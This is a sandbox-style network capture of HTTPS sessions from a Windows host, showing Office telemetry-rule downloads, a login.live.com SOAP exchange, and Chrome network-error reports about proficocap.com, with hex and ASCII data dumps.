                                                                          2024-12-08 19:51:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          91192.168.2.44985013.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:26 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:27 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:27 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 494
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                          ETag: "0x8DC582BB8972972"
                                                                          x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195127Z-r1cf579d778v97q7hC1EWRf95c00000005ug00000000849c
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          92192.168.2.44985520.190.147.8443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:27 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/soap+xml
                                                                          Accept: */*
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                          Content-Length: 3592
                                                                          Host: login.live.com
                                                                          2024-12-08 19:51:27 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                          2024-12-08 19:51:28 UTC569INHTTP/1.1 200 OK
                                                                          Cache-Control: no-store, no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                          Expires: Sun, 08 Dec 2024 19:50:28 GMT
                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                          x-ms-route-info: C510_BL2
                                                                          x-ms-request-id: 6b78259c-dfdb-465b-823b-a0b3ef836efa
                                                                          PPServer: PPV: 30 H: BL02EPF0001DA6F V: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          X-XSS-Protection: 1; mode=block
                                                                          Date: Sun, 08 Dec 2024 19:51:27 GMT
                                                                          Connection: close
                                                                          Content-Length: 11390
                                                                          2024-12-08 19:51:28 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          93192.168.2.44985935.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC476OUTPOST /report/v4?s=HCCGsQvdlNc%2BJmxUPQiMeRCM8982DcflmoYcquVM6726eKfELIICtRripthlRXUSrHio2UGj1gLsOdgH5IGc%2Fr2mwHJN9WyTPSehGdGI7Gpitjf9SdA6Z7qNEFVlIkB3fSg%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 510
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:28 UTC510OUTData Raw: 5b 7b 22 61 67 65 22 3a 39 33 38 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 35 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 38 2e 31 38 36 2e 33 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e 6b 65 64
                                                                          Data Ascii: [{"age":9388,"body":{"elapsed_time":2500,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://proficocap.com/","sampling_fraction":1.0,"server_ip":"104.18.186.31","status_code":200,"type":"http.response.invalid.incomplete_chunked
                                                                          2024-12-08 19:51:28 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          94192.168.2.44985835.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC486OUTPOST /report/v4?s=2QVXPr%2FqR5RXP8VAQUov%2Fe5q71OgMdXXymIWqlJDZY0svcQoztNrlByzoVUBye4qKo5Br3bfvdz%2FBN4Lognl34TCrbk4MVDUbQaYRz5JyxQlmp%2Ba8%2B6Wkpt0%2BUP50r6KAiHRxvaA HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 505
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:28 UTC505OUTData Raw: 5b 7b 22 61 67 65 22 3a 39 33 38 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 35 30 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 37 2e 32 35 2e 31 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 72 65 73 70 6f 6e 73 65 2e 69 6e 76 61 6c 69 64 2e 69 6e 63 6f 6d 70 6c 65 74 65 5f 63 68 75 6e 6b 65 64 5f
                                                                          Data Ascii: [{"age":9383,"body":{"elapsed_time":2507,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://proficocap.com/","sampling_fraction":1.0,"server_ip":"104.17.25.14","status_code":200,"type":"http.response.invalid.incomplete_chunked_
                                                                          2024-12-08 19:51:28 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          95192.168.2.44986035.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC492OUTPOST /report/v4?s=EYmntC%2FcD10lxgaAhlff%2Ff9ho3LrZqPX0Y6lGu6F%2ByYlSJxmge5No%2FSnJBL2ETxUu9n%2FDGXYTd%2BobgO%2Fx88HKGkiv3%2FN%2BqN1Rz5foS4Klr2rCIoU7ZUd3SpsUyVGb1O2Kw%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 811
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:28 UTC811OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 30 30 33 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 33 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 33 2e 31 37 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72
                                                                          Data Ascii: [{"age":50031,"body":{"elapsed_time":3036,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://proficocap.com/","sampling_fraction":1.0,"server_ip":"104.21.53.171","status_code":404,"type":"http.error"},"type":"network-error","ur
                                                                          2024-12-08 19:51:28 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          96192.168.2.44986135.190.80.14431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC489OUTPOST /report/v4?s=BaBa%2Bcls9XuXgYmrVEVw9n%2Bhi9%2F%2BAQrzF8U5ipv6RCLOiYa8iAIomZnG2OE7fSb0hTmYyr8zHA5IYWMJ9z%2BjRGX38WSfY%2Fa54ZhR3f2UUb0bgXN7iYKX3K6%2B1h3zxKm6cQ%3D%3D HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1279
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:28 UTC1279OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 37 30 36 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 30 34 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 35 2e 32 30 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 66 69 63 6f 63 61 70
                                                                          Data Ascii: [{"age":47066,"body":{"elapsed_time":3041,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.215.208","status_code":404,"type":"http.error"},"type":"network-error","url":"https://proficocap
                                                                          2024-12-08 19:51:28 UTC168INHTTP/1.1 200 OK
                                                                          Content-Length: 0
                                                                          date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Via: 1.1 google
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          97192.168.2.44985613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:28 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 420
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                          x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195128Z-r1cf579d7788pwqzhC1EWRrpd800000006hg000000004nh2
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:28 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          98192.168.2.44985713.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:28 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:29 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:28 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 472
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                          ETag: "0x8DC582B9D43097E"
                                                                          x-ms-request-id: e333ec31-201e-003f-1d06-486d94000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195128Z-r1cf579d778bb9vvhC1EWRs95400000005wg000000004cbx
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          99192.168.2.44986313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:29 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:29 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:29 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 486
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                          ETag: "0x8DC582B92FCB436"
                                                                          x-ms-request-id: 549300b5-601e-000d-6903-482618000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195129Z-r1cf579d778qlpkrhC1EWRpfc800000006wg000000007am3
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:29 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          100192.168.2.44986213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:29 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:29 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:29 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 427
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                          ETag: "0x8DC582BA909FA21"
                                                                          x-ms-request-id: 22946cbe-b01e-0021-6403-48cab7000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195129Z-r1cf579d778lntp7hC1EWR9gg400000005pg0000000073dy
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
